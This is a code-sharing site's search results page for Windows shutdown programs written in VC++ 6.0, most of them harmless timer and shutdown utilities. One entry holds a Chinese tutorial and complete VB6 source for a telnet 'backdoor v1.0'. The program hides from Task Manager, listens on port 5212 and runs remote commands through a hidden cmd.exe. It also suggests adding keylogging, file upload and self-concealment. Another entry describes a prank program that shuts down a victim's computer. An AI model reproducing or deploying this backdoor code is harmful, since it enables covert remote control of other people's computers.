Welcome![Sign In][Sign Up]
Location:
Search - shutdown VC 6.0

Search list

[OS program关机重启23

Description: WIN2K以上关机、重启的实现。开发环境WIN2003+VC 6.0 成都西南交通大学-WIN2K above shutdown and restart the program. Development Environment 6.0 WIN2003 VC Southwest Jiaotong University in Chengdu
Platform: | Size: 26513 | Author: 周丹霞 | Hits:

[OS programshutdown

Description: VC++6.0下编写 调用系统关机界面
Platform: | Size: 26167 | Author: 张鹏 | Hits:

[OtherShutdown

Description: VC++6.0写的可以隐藏窗口的定时关机程序,带可以准确(精确到ms)计时的秒表。
Platform: | Size: 33648 | Author: 潜龙 | Hits:

[OS programcomputer

Description: 关机整人 小程序! 作者: 小卢 mail:359581807@163.com blog:http://blog.sina.com.cn/qiqi8 欢迎联系,共同学习! 功能: 利用 WinExec 实现cmd的调用。shutdown 关机命令! 代码说明: 1.界面用了CXPButton的系列菜单及按钮,引用的文件有XPButton 。 2.在定时器中 用FindWindow实现了 cmd的 关闭。禁止使用 shutdown命令! 编译平台: 1.该代码在Windows XP+VC 6.0平台下编译通过。 使用说明: 1.按下 alt+q 建 或者输入“小奇” ,可以退出该程序, 并且停止 关机! 2.该带代码。可以用来供研究学习,使用! 3. 此程序为练习之作,代码简单,高手莫笑,您可以随意的复制,传播,但是请保留该信息!
Platform: | Size: 125810 | Author: 璐盟其 | Hits:

[Network DevelopVB Telnet编程指导思路

Description:

vB编程之TELNET
对于TELNET后门的编写我们可通过VC来编写,网上也有很多的关于用VC编写TELNET后门的源码。但是看X档案的一定不少是喜欢VB来编写程序的。纵然编写TELNET后门不是VB的长项,但这不并难实现。偶没见网上有用VB编写TELNET后门的文章,所以我就写下了此文,确切的说,
这不是个真正后门,只是一个后门的基本模型,甚至可以说毛坯。BUG的修改,不足的修补,功能的扩充还需读者动手来实现。
首先,我们在大脑里想象出一个后门运行的过程或者把其大概的流程画出来,然后就按这个过程逐步来实现。好了,
下面就开始我们的后门编写之路。首先就是当程序运行时防止再一个程序的运行,实现代码如下:
Private Sub Form_Load()
syspath = systempath()
'防止多个程序运行
If App.PrevInstance Then
End
End If
cmdno = True
'使程序不在任务管理器中显示
App.TaskVisible = False
'监听端口5212
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
其次,当telnet端请求连接时,服务端接受请求。(大家可以在此试着实现密码验证机制的实现,很简单,在此不再给出代码)
当TELNET连接时,触发ConnectionRequest事件,在这个事件中向控制端发送相应的成功连接和帮助信息。
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub
当我们连接上时,就需要对TELNET发来的命令进行一系列的处理和执行,以及执行相关的控制功能。
其中的问题是服务端接受来自TELNET客户端的连接和命令,由于TELNET传输命令时只能每间次传输一个字符的特殊性,
所以我们需要编写一个处理命令的过程,这个不难实现。还有就是对特殊字符的过滤和处理,如TELNET输入错误按DEL键,
按ENTER键来完成一条命令的输入。当TELNET连上服务端时,实现shell功能,以及shell功能和其它功能的分离。
对其中的问题有了大概的了解,那实现起来也就不难了。代码如下:
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
'过滤del键盘,用来telnet命令输入错误处理.如果输入del键盘,则当前命令无效
If Asc(str1) = 8 Then
myname = "" '清空命令存储
Winsock1.SendData vbCrLf & "shell>"
End If
'检察当前一个命令的完整性和对命令输入错误的处理
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
Elseif Asc(str1) <> 8 Then
'测试时,查看接受的命令
Text1.Text = myname & vbcrlf
myname = "" '清空对当前命令的存储,用来接受下一条命令
'--------下面是对接受命令的处理
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
'------------------------------
'判断是不是在虚拟shell中,不是则执行如下命令,否则执行虚拟shell命令语句
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "cammond error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
'调用执行结果发送过程
Call tranrlt
Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True '重置虚拟shell标志
End If
End If
End If
End Sub
接下来要考滤的是,虚拟shell的实现,我用了一个简单的方法,就是把命令执行结果写入一个文本文档,然后读取其中的内
容并将结果发送给控制端。代码如下:
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
至此,后门的主要问题都解决了,也许有的读者可以看出,这个后门模型存在问题。的确,这个后门模型并不完整,
所谓学而三思,思而后行,剩下的问题读者可以试着去解决。在此我不在给出源码。提示一下:
(1)如果TELNET不正常退出,服务端还会继续保存当前的会话,重新连接后失败。还有就是如何可以允许多人同时连接功能。
(2)读者可以加上密码验证机制,在此基础上扩大它的控制功能,如键盘记录,文件上传等。
(3)一个成功的后门,必然有一个好的隐藏和自我保护机制,所以,大家需要努力发挥自己的聪明和才智了。
以上只是个人愚见,不难实现。其实程序编写只有深入其中,动手实践,才会发现各种问题,而正是在这发现问题,解决问题的过程中,
你会学到更多,成功后的满足也更多。当我们苦苦思索解决一个问题或实现一种新方法和功能时,那种豁然开朗,
成功的喜悦会让你体会编程的乐趣。希望大家看完本文和在动手来完善它的时候,能学到些知识和技巧,那本文的目的也就达到了。

_____________--源码
Public syspath As String
Public cmdno As Boolean
Private Declare Sub Sleep Lib "kernel32" (ByVal nsecond As Long)
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Const EWX_REBOOT = 2
Const EWX_SHUTDOW = 1
Public myname As String
Sub tranrlt()
Dim strrlt As String
Open syspath & "\shell.rlt" For Input As #1
Do While Not EOF(1)
Line Input #1, strrlt
Winsock1.SendData strrlt & vbCrLf
Loop
Close #1
Winsock1.SendData "----------------------------------------------------" & vbCrLf
Shell "cmd.exe /c del " & syspath & "\shell.rlt&exit", vbHide
End Sub
Function systempath() As String
Dim filepath As String
Dim nSize As Long
filepath = String(255, 0)
nSize = GetSystemDirectory(filepath, 256)
filepath = Left(filepath, nSize)
systempath = filepath
End Function
Private Sub Form_Load()
syspath = systempath()
If App.PrevInstance Then
End
End If
cmdno = True
App.TaskVisible = False
Winsock1.LocalPort = 5212
Winsock1.Listen
End Sub
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then
Winsock1.Close
Winsock1.Accept requestID
Winsock1.SendData "------------------------backdoor v1.0-------------------------" & vbCrLf & _
Space(16) & "code by eighteen" & vbCrLf & "-------------------------------------------------------------" & _
vbCrLf & "type help to get help" & vbCrLf & "shell>"
End If
End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim str1 As String
Dim scmd As String
Dim i As Integer
Dim tag As Integer
Winsock1.GetData str1
If Asc(str1) = 8 Then
myname = ""
Winsock1.SendData vbCrLf & "command error!" & vbCrLf & "shell>"
End If
If (Asc(str1) <> 13) And (Asc(str1) <> 8) Then
myname = myname + str1
ElseIf Asc(str1) <> 8 Then
Text1.Text = myname & vbCrLf
myname = ""
tag = InStr(Text1.Text, Chr(13)) - 1
scmd = Left(Text1.Text, tag)
If cmdno = True Then
Select Case scmd
Case "help"
Winsock1.SendData "cmd     -------打开shell" & vbCrLf & "reboot     -------重启" & _
vbCrLf & "shutdown   ------- 关机" & vbCrLf & "exit     -------退出" & vbCrLf & "shell>"

Case "reboot"
ExitWindowsEx EXW_REBOOT, 0

Case "shutdown"
ExitWindowsEx EXW_SHUTDOWN, 0
Case "exit"
Winsock1.SendData "exit seccessful!"
Winsock1.Close
Winsock1.Listen
Case "cmd"
Winsock1.SendData "获得虚拟shell成功!" & vbCrLf & "vcmd>"
cmdno = False
Case Else
Winsock1.SendData "command error!" & vbCrLf & "shell>"
End Select
Else
Shell "cmd.exe /c" & Space(1) & scmd & Space(1) & ">" & syspath & "\shell.rlt&exit", vbHide
Sleep (500)
Call tranrlt

Winsock1.SendData "如果想退出虚拟shell,清输入exit" & vbCrLf & "vcmd>"
If scmd = "exit" Then
Winsock1.SendData "成功退出虚拟shell!" & vbCrLf & "shell>"
cmdno = True
End If
End If
End If
End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)
Winsock1.Close
Winsock1.Listen
End Sub


Platform: | Size: 8205 | Author: onetwogoo | Hits:

[OS program关机重启23

Description: WIN2K以上关机、重启的实现。开发环境WIN2003+VC 6.0 成都西南交通大学-WIN2K above shutdown and restart the program. Development Environment 6.0 WIN2003 VC Southwest Jiaotong University in Chengdu
Platform: | Size: 26624 | Author: 周丹霞 | Hits:

[OS programshutdown

Description: VC++6.0下编写 调用系统关机界面-VC++ 6.0 prepare call system shutdown interface
Platform: | Size: 1565696 | Author: 张鹏 | Hits:

[OtherShutdown

Description: VC++6.0写的可以隐藏窗口的定时关机程序,带可以准确(精确到ms)计时的秒表。-VC++ 6.0 written to hide the window from time to time shutdown procedures, with an accurate (accurate to ms) of the stopwatch timer.
Platform: | Size: 3502080 | Author: 潜龙 | Hits:

[OtherAlarmClock

Description: 一个用VC++ 6.0写的定时提醒小程序,具有定时提醒,定时播放音乐,定时打开指定程序,定时关机等功能-A used VC++ 6.0 write regularly reminded of small procedures, with regular reminders, regularly aired on music, from time to time to open the specified procedure, timing shutdown and other functions
Platform: | Size: 103424 | Author: | Hits:

[OS programcomputer

Description: 关机整人 小程序! 作者: 小卢 mail:359581807@163.com blog:http://blog.sina.com.cn/qiqi8 欢迎联系,共同学习! 功能: 利用 WinExec 实现cmd的调用。shutdown 关机命令! 代码说明: 1.界面用了CXPButton的系列菜单及按钮,引用的文件有XPButton 。 2.在定时器中 用FindWindow实现了 cmd的 关闭。禁止使用 shutdown命令! 编译平台: 1.该代码在Windows XP+VC 6.0平台下编译通过。 使用说明: 1.按下 alt+q 建 或者输入“小奇” ,可以退出该程序, 并且停止 关机! 2.该带代码。可以用来供研究学习,使用! 3. 此程序为练习之作,代码简单,高手莫笑,您可以随意的复制,传播,但是请保留该信息!-err
Platform: | Size: 125952 | Author: 璐盟其 | Hits:

[Windows DevelopMyControlTools

Description: VC++6.0实现的自动关机和光驱操作,如要用此程序请不要修改原有信息。-VC++ 6.0 to achieve the automatic shutdown and optical disk drive operations, such as the use of this procedure, please do not modify the original information.
Platform: | Size: 754688 | Author: | Hits:

[OtherAutoShutDown

Description: vc++6.0实现的自动关机小程序,测试很灵敏!-vc++ 6.0 to achieve the automatic shutdown of small procedures, the test is very sensitive!
Platform: | Size: 48128 | Author: 法拉 | Hits:

[OS programwin2000TimeShutDown

Description: VC++6.0编写的一个定时关机的小程序,简单实用-VC++6.0 a regular shutdown of small programs
Platform: | Size: 34816 | Author: jeck | Hits:

[OS programvc6.0chengxi

Description: 一个自动关机的程序代码,主要是应用了vc++6.0的知识,调用了mfc类库,希望对喜欢c++的朋友有所帮助!-An automatic shutdown of the program code is mainly applied knowledge vc++6.0, call the mfc library, hope to c++ like to help a friend!
Platform: | Size: 338944 | Author: chenmubo | Hits:

[Windows DevelopShutDown2

Description: 类似于windows自带的shutdown小程序,用vc++ 6.0 编写。有多种选择,可以关机、重启、注销、强制关机、强制重启、强制注销-Similar to the small windows built-in shutdown procedures, with the preparation of vc++ 6.0. There are many options, you can shutdown, restart, write-off, forced the shutdown, forced restart, forced cancellation of
Platform: | Size: 6144 | Author: hancs | Hits:

[Othersupershut1.5

Description: 一个简单的VC++6.0定时关机程序,可以选择 关机 休眠,可以定时,会显示现在时间和剩余时间,在最后一分钟会跳出,打开程序时会自动隐藏到系统托盘。另外,本人是新手,所以加了N多注释。你打开看就知道了,注释都快比代码多了。 -A simple VC++6.0 regular shutdown procedure, you can choose off to sleep, may be from time to time, will show the time and the remaining time will jump out at the last minute to open the program will automatically hide the system tray. In addition, I am a novice, so more than N addition of annotations. You open to see that, and comments faster than the code more.
Platform: | Size: 5282816 | Author: suyanhua | Hits:

[OtherAutoShutdown

Description: 自动关机程序,在VC++6.0下,基于对话框给予的实现-Automatic shutdown procedures, the VC++6.0 under the grant based on the realization of the dialog box
Platform: | Size: 44032 | Author: strf | Hits:

[Othershut_down

Description: VC++6.0实现一键关机程序,包括3种关机方式,有的需要打开注释行才能使用。-VC++6.0 to achieve a key shutdown procedures, including three kinds of shutdown mode, and some need to open the comment line to use.
Platform: | Size: 1882112 | Author: xsw | Hits:

[OS programshutdown

Description: VC++6.0编译,实现关机、重启、注销功能的实现-VC++6.0 compiler to achieve shutdown, restart, log off function of the realization
Platform: | Size: 1602560 | Author: | Hits:

[Windows DevelopProtect

Description: vc++6.0编写,程序保护,控制程序的启动和关闭,使程序长时间运行.-vc++6.0 written procedures to protect the startup and shutdown of the control program, the long-running program.
Platform: | Size: 4608000 | Author: houxianfeng | Hits:
« 12 »

CodeBus www.codebus.net